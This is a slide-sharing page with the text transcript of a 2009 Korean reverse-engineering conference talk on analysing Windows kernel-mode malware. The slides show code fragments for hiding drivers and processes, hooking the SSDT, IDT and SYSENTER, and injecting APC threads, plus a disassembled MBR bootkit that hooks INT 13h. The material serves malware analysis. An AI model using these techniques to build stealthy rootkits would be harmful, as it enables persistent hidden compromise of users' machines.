Upload File

[2009 codeengn conference 03] koheung - 윈도우 커널 악성코드에 대한 분석 및 방법

  • Home
  • Technology
  • [2009 CodeEngn Conference 03] koheung - 윈도우 커널 악성코드에 대한 분석 및 방법
50
2009.07.04 3rd CodeEngn ReverseEngineering Seminar

Upload: gangseok-lee

Post on 20-May-2015

1.136 views

Category:

Technology


15 download

Report

DESCRIPTION

2009 CodeEngn Conference 03 윈도우 커널모드에서 동작하는 악성코드들의 동작원리와 목적을 알아보고, 윈도우 커널모드의 악성코드를 분석하는 방법에 대해 살펴본다. http://codeengn.com/conference/03

TRANSCRIPT

  • 1. 2009.07.04 3rd CodeEngn ReverseEngineering Seminar

2. Malware Infection Windows Kernel Exam 1. Hide Driver & Process Exam 2. Hook SDT & IDT Exam 3. Attach Device Exam 4. Create UserMode Thread Exam 5. Subverting the MBR Analysis 3rd CodeEngn ReverseEngineering Seminar 3. Virus Trojan Worm Exploit / Vulnerability Spyware / Addware Hox 3rd CodeEngn ReverseEngineering Seminar 4. [ E-Mail ] - HTML - - HyperLink [ WEB ] - Download - Iframe - Script [ ] - $ - User - Exploit [ Application Exploit ] - Office - Acrobat - Explorer - [ Messenger ] - MSN - NateOn - - [ USB Memory ] - Autorun.inf - Virus - Trojan - Exploit [ Windows Vulnerability ] - MS09-XXX [ Hacking ] - Exploit - - [ Internet Worm ] - Subnet - Shared - Exploit [ Software ] - Trojan - Dropper - 3rd CodeEngn ReverseEngineering Seminar 5. User Kernel System Virtual Machine DOS Virtual Machine Win32 Application System DLL Win16 Application System DLL .DRV Driver MS-DOS Application .SYS Driver Ring-0 Driver Virtualizing Device Driver Hardware 3rd CodeEngn ReverseEngineering Seminar 6. User Mode Kernel Mode Applications Hardware abstraction layer Hardware Win32 subsystem I/O Manager Device Drivers Win32 API calls System service interface IRP passed to driver dispatch routine HAL calls Platform-specific operations 3rd CodeEngn ReverseEngineering Seminar 7. A Rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer 3rd CodeEngn ReverseEngineering Seminar 8. 3rd CodeEngn ReverseEngineering Seminar 9. Web Hacking Insert IFrame Or JavaScript Exploit or FileDownload Malware [ SPECIAL FEATURE ] I. Rootkit Hide Loading II. Driver Hiding III. Process Hiding 3rd CodeEngn ReverseEngineering Seminar 10. SCM (Service Control Manager) ZwSetSystemInformation ZwSetSystemInformation( SystemLoadAndCallImage, &MyDriver, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE) ) ZwLoadDriver ZwLoadDriver( DriverServiceName ) 3rd CodeEngn ReverseEngineering Seminar 11. DRIVER_OBJECT PLDR_DATA_TABLE_ENTRY B.SYS LDR_DATA_TABLE_ENTRY LDR_DATA_TABLE_ENTRYLDR_DATA_TABLE_ENTRY - LDR_DATA_TABLE_ENTRY (pDriverObject->DriverSection) pLDR = *((LDR_DATA_TABLE_ENTRY**)((DWORD)pDriverObject + 0x14)); - LIST_ENTRY *((PDWORD)pLDR-> InLoadOrderLinks.Blink) = (DWORD)pLDR-> InLoadOrderLinks.Flink; *((DWORD*)pLDR-> InLoadOrderLinks.Flink->Blink = (DWORD)pLDR-> InLoadOrderLinks.Blink; 3rd CodeEngn ReverseEngineering Seminar 12. ETHREAD KTHREAD EPROCESS EPROCESSEPROCESS KPROCESS KPROCESSKPROCESS A.EXE - PsGetCurrentProcess() mov eax, fs:0x00000124 mov eax, [eax + 0x44] - KPCR (Kernel Processor Control Region) mov eax, fs:0x00000000 // KPCR mov eax, [eax + 0x20] // KPRCB (Kernel Processor Control Block) mov eax, [eax + 0x4] // KTHREAD - EPROCESS mov eax, KTHREAD mov eax, [eax + 0x44] - LIST_ENTRY pList = (PLIST_ENTRY)[EPROCESS+0x88]; // Over WinXP *((DWORD*)pList->Blink) = (DWORD)pList->Flink; *((DWORD*)pList->Flink+1) = (DWORD)pList->Blink; pList->Flink = (LIST_ENTRY*)&(pList->Flink); pList->Blink = (LIST_ENTRY*)&(pList->Flink); 3rd CodeEngn ReverseEngineering Seminar 13. 3rd CodeEngn ReverseEngineering Seminar 14. Attack Send SpamMail Receive the Mail with Trojan (EXE, DOC, PPT, JPG, WMF, ) [ SPECIAL FEATURE ] I. SSDT(System Service Descriptor Table) Hooking II. Detour Patch, Trampoline III. IDT(Interrupt Descriptor Table) Hooking IV. SYSENTER Hooking 3rd CodeEngn ReverseEngineering Seminar 15. Windows Application WriteFile In Kernel32.dll NtWriteFile In ntdll.dll Dispatch Table *Func 0 *Func 1 *Func 2 . . . Service Routine In ntoskrnl.exe Userland Kernel EAX Service Number or Index EDX Parameter Address API In User32.dll/Gdi32.dll Dispatcher In Ntoskrnl.exe, Win32k.sys Service Routine In Win32k.sys INT 0x2E or SYSENTER Dispatch ShadowTable *Func 0 *Func 1 *Func 2 . . . 3rd CodeEngn ReverseEngineering Seminar 16. 804AB3BF 804AE86B 804BDEF3 8050B034 804C11F4 80459214ServiceCounterTable 00000000 NumberOfService F8 18 20 2C 2C 40 2C KeServiceDescriptorTable System Service Dispatch Table (SSDT) System Service Parameter Table (SSPT) ZwCreateFile NewZwCreateFile Call 80459214 F0001234 OldZwXXX = (ZWXXX)(KeServiceDescriptorTable.ServiceTableBase[*(PULONG)((PUCHAR)ZwXXX+1)]); _asm { CLI MOV EAX, CR0 AND EAX, 0xFFFEFFFFh MOV CR0, EAX } (KeServiceDescriptorTable.ServiceTableBase[*(PULONG)((PUCHAR)ZwXXX+1)]) = (ULONG)HookZwXXX; _asm { MOV EAX, CR0 OR EAX, NOT 0xFFFEFFFFh MOV CR0, EAX STI } 3rd CodeEngn ReverseEngineering Seminar 17. Detour Patch FAR JMP Original Function ROOTKIT CODE Removed Instructions FAR JMP (back) Trampoline 55 8B EC 53 33 DB 38 5D 24 EA AA AA AA AA 08 00 90 90 55 PUSH EBP 8BEC MOV EBP, ESP 53 PUSH EBX 33DB XOR EBX, EBX 385D24 CMP [EBP+24], BL FAR JMP 3rd CodeEngn ReverseEngineering Seminar 18. Typedef struct { WORD IDTLimit; WORD LowIDTbase; WORD HiIDTbase; } IDTINFO; Typedef struct { WORD LowOffset; WORD selector; BYTE unused_lo; unsigned char unused_hi:5; unsigned char DPL:2; unsigned char P:1; WORD HiOffset; } IDTENTRY; _asm { SIDT idtinfo } idtentry = (IDTENTRY*)MAKELONG( idtinfo.LowIDTbase, idtinfo.HiIDTbase ); int2e = &(idtentry[NT_SYSTEM_SERVICE_INT]); _asm { CLI LEA EAX,MyKiSystemService MOV EBX,int2e MOV [EBX],AX SHR EAX,16 MOV [EBX+6],AX STI } 3rd CodeEngn ReverseEngineering Seminar 19. MSRs (Model-Specific Registers) The model-specific registers (MSRs) that can be read with the RDMSR and written with the WRMSR instructions. IA32_SYSENTER_EIP (0x176) The virtual address of the kernel-mode entry point that code should begin executing at once the transition has completed. __asm{ mov ecx, 0x176 rdmsr mov OrgSysenter, eax mov eax, HookSysenter wrmsr } 3rd CodeEngn ReverseEngineering Seminar 20. ZwQuerySystemInformation - Hide Process - Get Loaded System Module List ZwOpenKey, ZwQueryKey, ZwCreateKey, ZwEnumerateKey - Hide Registry ZwSaveKey, ZwDeviceIoControlFile - Restore & Backup Registry ZwQueryDirectoryFile - Hide File ZwTerminateProcess - No kill Process ZwOpenFile, ZwCreateSection - Redirection 3rd CodeEngn ReverseEngineering Seminar 21. 3rd CodeEngn ReverseEngineering Seminar 22. Worm Virus Subnet Scanning & Attack [ SPECIAL FEATURE ] I. NTFS ADS(Alternate Data Stream) Hiding II. File System Filtering III. Network System Filtering IV. Keyboard Filtering 3rd CodeEngn ReverseEngineering Seminar 23. Example 3rd CodeEngn ReverseEngineering Seminar 24. Application Program Attach Filter I/O Manager Fast I/O Cache Manager File System Driver Disk Driver Disk Driver Disk Driver C: D: E: B.SYS KernelMode UserMode Physical Device 3rd CodeEngn ReverseEngineering Seminar 25. Msafd.dll Protocol Drivers (Tcpip.sys) NDIS Miniport Driver NDIS.sys NDIS Library Function NIC Device NDIS Intermediate Driver TDI Drivers (Tdi.sys) Ws2_32.dll Application Program Attach FilterB.SYS KernelMode UserMode Physical Device 3rd CodeEngn ReverseEngineering Seminar 26. Application Program Attach Filter I/O Manager High Level Driver Low Level Driver Completion Routine KernelMode UserMode Keyboard Shared Memory Logging Thread Physical Device 3rd CodeEngn ReverseEngineering Seminar 27. 3rd CodeEngn ReverseEngineering Seminar 28. Web Surfing (Home PC) Autorun (Company PC) P2P worm (USB Memory) [ SPECIAL FEATURE ] I. Create UserMode APC Thread II. Infected NDIS.SYS III. Injected System Processes IV. Is not File, Registry, Process 3rd CodeEngn ReverseEngineering Seminar 29. HIGH_LEVEL POWER_LEVEL IPI_LEVEL CLOCK2_LEVEL CLOCK1_LEVEL PROFILE_LEVEL DISPATCH_LEVEL APC_LEVEL PASSIVE_LEVEL 0 1 2 27 28 29 30 31 DIRQLs 3 - 26 Hardware Software 3rd CodeEngn ReverseEngineering Seminar 30. Process A ThreadMDL Driver A Kernel Mode NonPaged Memory User Mode Paged Virtual Memory Memory Mappin g 1. KeGetCurrentThread 2. ExAllocatePool 3. IoAllocateMdl 4. KeStackAttachProcess 5. MmMapLockedPagesSpecifyCac he 6. KeInitialzeApc 7. KeInsertQueueApc Call Stack APC_LEVEL Thread 3rd CodeEngn ReverseEngineering Seminar 31. Process A Thread Kernel Mode NonPaged Memory User Mode Paged Virtual Memory Memory Copy 1. ZwOpenProcess 2. ZwAllocateVirtualMemory 3. memcpy 4. KeStackAttachProcess 5. KeInitialzeApc 6. KeInsertQueueApc Call Stack APC_LEVEL Driver A Thread 3rd CodeEngn ReverseEngineering Seminar 32. Process A Thread Thread Driver A Kernel Mode NonPaged Memory User Mode Paged Virtual Memory Memory Copy 1. PsLoopupProcessByProcessId 2. KeAttachProcess 3. GetUserMode *PEB 4. NtAllocateVirtualMemory 5. KeUserModeCallBack 6. KeDetachProcess Call User32.dll Driver A Thread Call Win32k.sys Fs:[0x124] ; KTHREAD Kthread->Teb ; TEB TEB->ProcessEnvironmentBlock ; PEB PEB->KernelCallbackTable ; Win32k.sys Table 3rd CodeEngn ReverseEngineering Seminar 33. Services.exe DLL Thread Driver A Kernel Mode NonPaged Memory User Mode Paged Virtual Memory Memory Copy Win32/Dnis.B Encoded A Encoded B NDIS.SYS SpamDriver Call Stack APC_LEVEL DLL Drop Drop 3rd CodeEngn ReverseEngineering Seminar 34. 3rd CodeEngn ReverseEngineering Seminar 35. Crack Software Illegal Copy Spy&Addware P2P Software Exploit Drop Malware Download [ SPECIAL FEATURE ] I. Infected Disk MBR, Unpartitioned Sector II. BIOS INT 13h Hooking III. Boot time Loading IV. Is not File, Registry, Process V. Hide Infected MBR 3rd CodeEngn ReverseEngineering Seminar 36. System Power On BIOS (ROM) Select Boot Device, Read Devices MBR into Memory, Execute MBR (Disk) Scan the Bootable Partition, Read Partition Boot Sector Ntldr (Osloader.exe) From real-mode to protected-mode Ntoskrnl.exe Hal.dll Smss.exe (Session Manager SubSystem) Win32k.sys Csrss.exe (Client Server Runtime SubSystem) Winlogon.exe Services.exe Lsass.exe Msgina.dll (Local Security Authentication SubSystem) 3rd CodeEngn ReverseEngineering Seminar 37. ROM BIOS ( ColdBoot CS:IP=FFFF:0000) Interrupt Vector Table (0000:0000 ~ 0000:03FF) BIOS Data Area (0000:0400 ~ 0000:04FF) Conventional Memory (0000:0000 ~ A000:0000) 640 Kbyte 3rd CodeEngn ReverseEngineering Seminar 38. 446 Byte 64 Byte 2 Byte Boot code Partition Table Magic Number MBR = 0 Sector (512 Byte) Partition 1 Partition 2 Partition 3 Partition 4 Boot Partition Boot Sector Extended partition boot recordMBR Partitions within an extended partition 3rd CodeEngn ReverseEngineering Seminar 39. Overwrite MBR Hook INT 13h Original MBR (Sector 62) 1. Partition Table (0x1BE) 2. Partition Table (0x1CE) 3. Partition Table (0x1DE) 4. Partition Table (0x1EE) Signature 3rd CodeEngn ReverseEngineering Seminar 40. [ BEGIN: 0000:7C00 ] 0000:7C00 FA CLI disable interrupt 0000:7C01 33C0 XOR AX,AX AX= 0000 0000:7C03 8ED0 MOV SS,AX SS = 0000 0000:7C05 BC007C MOV SP,7C00 SP = 7C00 0000:7C08 8BF4 MOV SI,SP SI = 7C00 0000:7C0A 50 PUSH AX 0000:7C0B 07 POP ES ES = 0000 0000:7C0C 50 PUSH AX 0000:7C0D 1F POP DS DS = 0000 0000:7C0E FB STI allow interrupt 0000:7C0F FC CLD clear direction 0000:7C10 BF0006 MOV DI,0600 DI = 0600 0000:7C13 B90001 MOV CX,0100 CX = 0x100(256 words) 0000:7C16 F2 REPNZ move MBR from 0000:7c00 0000:7C17 A5 MOVSW to 0000:0600 0000:7C18 EA1D060000 JMP 0000:061D jmp to NEW_LOCATION 3rd CodeEngn ReverseEngineering Seminar 41. [ NEW_LOCATION: 0000:061D ] 0000:061D BEBE07 MOV SI,07BE 0600 + 01BE(1st Partition Table) 0000:0620 B304 MOV BL,04 Maximum Table Size = 4 [ SEARCH_LOOP1: SEARCH FOR AN ACTIVE PARTITION ENTRY ] 0000:0622 803C80 CMP BYTE PTR [SI],80 Active Boot Partition? 0000:0625 740E JZ FOUND_ACTIVE yes 0000:0627 803C00 CMP BYTE PTR [SI],00 Inactive Boot Partition? 0000:062A 751C JNZ NOT_ACTIVE no 0000:062C 83C610 ADD SI,+10 Next Partition Table 0000:062F FECB DEC BL Decrease Table Size 0000:0631 75EF JNZ SEARCH_LOOP1 Loop 0000:0633 CD18 INT 18 GO TO ROM BASIC [ FOUND_ACTIVE: FOUND THE ACTIVE ENTRY ] 0000:0635 8B14 MOV DX,[SI] HardDisk(0x80) for INT 13 0000:0637 8B4C02 MOV CX,[SI+02] Start Sector for INT 13 0000:063A 8BEE MOV BP,SI BP = Partition Table ptr [ SEARCH_LOOP2: MAKE SURE ONLY ONE ACTIVE ENTRY ] 0000:063C 83C610 ADD SI,+10 Next Partition Table 0000:063F FECB DEC BL Decrease Table Size 0000:0641 741A JZ READ_BOOT jmp if end of table 0000:0643 803C00 CMP BYTE PTR [SI],00 Inactive Boot Partition? 0000:0646 74F4 JZ SEARCH_LOOP2 yes 3rd CodeEngn ReverseEngineering Seminar 42. [ NOT_ACTIVE: MORE THAN ONE ACTIVE ENTRY FOUND ] 0000:0648 BE8B06 MOV SI,068B display "Invld prttn tbl" [ DISPLAY_MSG: DISPLAY MESSAGE LOOP ] 0000:064B AC LODSB get char of message 0000:064C 3C00 CMP AL,00 end of message 0000:064E 740B JZ HANG yes 0000:0650 56 PUSH SI save SI 0000:0651 BB0700 MOV BX,0007 screen attributes 0000:0654 B40E MOV AH,0E output 1 char of message 0000:0656 CD10 INT 10 to the display 0000:0658 5E POP SI restore SI 0000:0659 EBF0 JMP DISPLAY_MSG do it again [ HANG: HANG THE SYSTEM LOOP ] 0000:065B EBFE JMP HANG sit and stay! [ READ_BOOT: READ ACTIVE PARITION BOOT RECORD ] 0000:065D BF0500 MOV DI,0005 INT 13 retry count 3rd CodeEngn ReverseEngineering Seminar 43. [ INT13RTRY: INT 13 RETRY LOOP ] 0000:0660 BB007C MOV BX,7C00 ES:BX = read buffer 0000:0663 B80102 MOV AX,0201 Read 1 sector (AH=02h,AL=01h) 0000:0666 57 PUSH DI save DI 0000:0667 CD13 INT 13 INT 13h AH 02h 0000:0669 5F POP DI restore DI 0000:066A 730C JNB INT13OK jmp if no INT 13 0000:066C 33C0 XOR AX,AX call INT 13 and 0000:066E CD13 INT 13 do disk reset 0000:0670 4F DEC DI decr DI 0000:0671 75ED JNZ INT13RETRYif not zero, try again 0000:0673 BEA306 MOV SI,06A3 display "Errr ldng systm" 0000:0676 EBD3 JMP DISPLAY_MSG jmp to display loop [ INT13OK: INT 13 ERROR ] 0000:0678 BEC206 MOV SI,06C2 "missing op sys" 0000:067B BFFE7D MOV DI,7DFE point to signature 0000:067E 813D55AA CMP WORD PTR [DI],AA55 Signature Correct? 0000:0682 75C7 JNZ DISPLAY_MSG no 0000:0684 8BF5 MOV SI,BP set SI 0000:0686 EA007C0000 JMP 0000:7C00 JUMP TO THE BOOT SECTOR 3rd CodeEngn ReverseEngineering Seminar 44. [ BEGIN: 0000:7C00 ] 0000:7C00 FA CLI 0000:7C01 33DB XOR BX,BX BX=0000 0000:7C03 8ED3 MOV SS,BX SS=0000 0000:7C05 368926FE7B MOV SS:[7BFE],SP Store SP 0000:7C0A BCFE7B MOV SP,7BFE SP=7BFE 0000:7C0D 1E PUSH DS 0000:7C0E 6660 PUSHAD 0000:7C10 FC CLD 0000:7C11 8EDB MOV DS,BX DS=0000 0000:7C13 BE1304 MOV SI,0413 0040h:0013h - base memory size 0000:7C16 832C02 SUB WORD PTR [SI],02 2Kbyte (2048 = 4Sector) 0000:7C19 AD LODSW AX=memory Size 0000:7C1A C1E006 SHL AX,06 0000:7C1D 8EC0 MOV ES,AX 0000:7C1F BE007C MOV SI,7C00 SI=7C00 0000:7C22 33FF XOR DI,DI DI=0000 0000:7C24 B90001 MOV CX,0100 1 Sector (100h Word) 0000:7C27 F3A5 REPZ MOVSW DS:SI to ES:DI 3rd CodeEngn ReverseEngineering Seminar 45. 0000:7C29 B80202 MOV AX,0201 read sector Size 1 (AH=2,AL=1) 0000:7C2C B13D MOV CL,3D CL=61 sector 0000:7C2E BA8000 MOV DX,0080 DL=80 Hard Disk 0000:7C31 8BDF MOV BX,DI ES:BX=ES:0000 Read Buffer 0000:7C33 CD13 INT 13 0000:7C35 33DB XOR BX,BX BX=0000 0000:7C37 668B474C MOV EAX,DS:[BX+4C] INT 13h Vector Table 0000:7C3B 6626A37300 MOV ORG_INT13,EAX Backup INT 13h 0000:7C40 C7474C6600 MOV WORD PTR [BX+4C],0066 0000:7C45 8C474E MOV [BX+4E],ES Hook 0000:7C48 06 PUSH ES 0000:7C49 684D00 PUSH 004D 0000:7C4B CB RETF [ READ ORIGINAL MBR : ES:004D ] 0000:7C4D FB STI 0000:7C4E 8EC3 MOV ES,BX ES=0000 0000:7C50 B80102 MOV AX,0201 read sector Size 1 0000:7C53 B93F00 MOV CX,003E CL=62 sector 0000:7C56 BA8000 MOV DX,0080 DL=80 Hard Disk 0000:7C59 B77C MOV BH,7C ES:BX=0000:7C00 read Buffer 0000:7C5B CD13 INT 13 0000:7C5D 6661 POPAD 0000:7C5F 1F POP DS 0000:7C60 5C POP SP 0000:7C61 EA007C0000 JMP 0000:7C00 Jmp Original MBR 3rd CodeEngn ReverseEngineering Seminar 46. [ Hooked INT 13h Handler ] 0000:7C66 9C PUSHF 0000:7C67 80FC42 CMP AH,42 0000:7C6A 740B JZ 7C77 Extended Read? 0000:7C6C 80FC02 CMP AH,02 0000:7C6F 7406 JZ 7C77 Sector Read? 0000:7C71 9D POPF 0000:7C72 EAXXXXXXXX JMP ORG_INT13 Jmp Original INT 13h [ READ ORIGINAL MBR : ES:004D ] 0000:7C77 2E88269000 MOV STOREAH,AH 0000:7C7C 9D POPF 0000:7C7D 9C PUSHF 0000:7C7E 2EFF1E7300 CALL ORG_INT13 Call Original INT 13h 0000:7C83 0F829D00 JB 7D24 0000:7C87 9C PUSHF 0000:7C88 FA CLI 0000:7C89 06 PUSH ES 0000:7C8A 6660 PUSHAD 0000:7C8C FC CLD 0000:7C8D B400 MOV AH,00 AH = 00 0000:7C8F B5XX MOV CH, STOREAH CH = STOREAH 0000:7C91 80FD42 CMP CH,42 Extended Read? 0000:7C94 7504 JNZ 7C9A 3rd CodeEngn ReverseEngineering Seminar 47. Dropper MBR Rootkit - Overwrite HardDisk Sector 0, 61, 62 & Unpartitioned Sectors MBR - Real Mode - Read Sector 61, 62 - Hook INT 13h Partition Boot Sector - Real Mode - Read First 16 Sector Windows Boot Loader - Real Mode - Load & Execute Ntldr NTOSKRNL.EXE - 32 Protected Mode - Hook IoInitSystem - Load & Execute Rootkit Driver Hide MBR - Hook DriverDisk IRP_MJ_READ, IRP_MJ_WRITE 3rd CodeEngn ReverseEngineering Seminar 48. 3rd CodeEngn ReverseEngineering Seminar 49. Use Kernel Debugger - UserMode : Olly, IDA, Windbg, Softice, TRW - KernelMode : Windbg, Softice Breakpoint -Kernel API (Ex, IoCreateDevice, IoCreateSymbolicLink, ) - EntryPoint (PE->IMAGE_OPTIONAL_HEADER->Checksum) - DispatchRoutine, DPC, APC, CallBack SCM (Service Control Manager) - OpenSCManager, CreateService, StartService Polymorphic / PE Patch / Encode - Modify PE Header (ExportTable, ImportTable, IMAGE_OPTIONAL_HEADER- >Subsystem) 3rd CodeEngn ReverseEngineering Seminar 50. 3rd CodeEngn ReverseEngineering Seminar


윈도우 클라이언트 자동 업데이트 설정

태양전지를 이용한 스마트 윈도우 기술 동향 - ETRI...이규성 외 / 태양전지를 이용한 스마트 윈도우 기술 동향 37 조절하는 방식의 사용도

Chapter1. 컴퓨터 기초와 윈도우 7

WinDbg 를 이용한 커널 드라이버 디버깅 1. WinDbg 개요

커널 프로그래밍 (Kernel Programming)

윈도우 프로그래밍의 이해

나의 첫 윈도우/맥 애플리케이션 개발하기

[실전 윈도우 디버깅] 13 포스트모템 디버깅

윈도우 7 데스크톱 경험

윈도우 운영체제와 윈도우 응용 프로그램의 특징을 이해한다 . SDK 응용 프로그램 작성 과정 , 기본 구조 , 동작 원리를 이해한다

[NHN_NEXT/윈도우 게암 프로그래밍] 3. 라이브러리

9장 윈도우 소켓 프로그래밍contents.kocw.net/KOCW/document/2015/korea_sejong/... · 2016-09-09 · IT CookBook, 윈도우 APIAPI 프로그래밍 1 윈도우 소켓 프로그래밍

09 10...2019/08/27  · 공공 윈도우 10 전환, 올해 속도낸다 윈도우 7 종료… ATM, 산업기기 향항 공격 되풀이되나 윈도우 7 지원 중단, ... 업그레이드

리눅스 시스템 & 커널 기초 P.46 – P.53

제 8 장 커널 & 파일 시스템 분석

윈도우 커널모드 드라이버 64 비트 포팅

임베디드 리눅스 커널

[2014 CodeEngn Conference 11] 정든품바 - 웹성코드

초보자를 위한 Kernel based windows rootkit -1부-€¦ · API 호출 과정을 커널 모드까지 진입하여 알아보려면 먼저 커널 모드가 무엇인지를 알아야

오토베이스 9 툴바 윈도우 설정

제13강 커널 컴파일 및 커널 모듈 - KOREATECH · 2019-08-29 · RaspberryPi 커널컴파일 및 커널모듈 1 제13강 커널 컴파일 및 커널 모듈 커널 컴파일

[2007 CodeEngn Conference 01] mrbrown - Manual Unpacking

리눅스 커널 디버거 KGDB/KDB

윈도우 매니저 스터디: 0.윈도우 매니저 소개

프로그램 , 커널 설치 및 업그레이드

[2014 CodeEngn Conference 10] 심준보 - 급전이 필요합니다

유니티로 윈도우 플랫폼에 포팅하기

[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹

노태상 - 리눅스 커널 개요 및 이슈 아이엠 (2010Y01M30D)

소켓 프로그래밍 A 2015버전 - contents.kocw.netcontents.kocw.net/KOCW/document/2015/korea_sejong/leejonguk/14.pdf · IT CookBook, 윈도우 APIAPI 프로그래밍 1 윈도우

[2012 CodeEngn Conference 07] M-Stoned - iThreat

Made in 양선배 윈도우 이미지

윈도우 8.1 앱개발 새로운 API 들

[2013 CodeEngn Conference 09] proneer - Malware Tracker

11장 윈도우 스레드 풀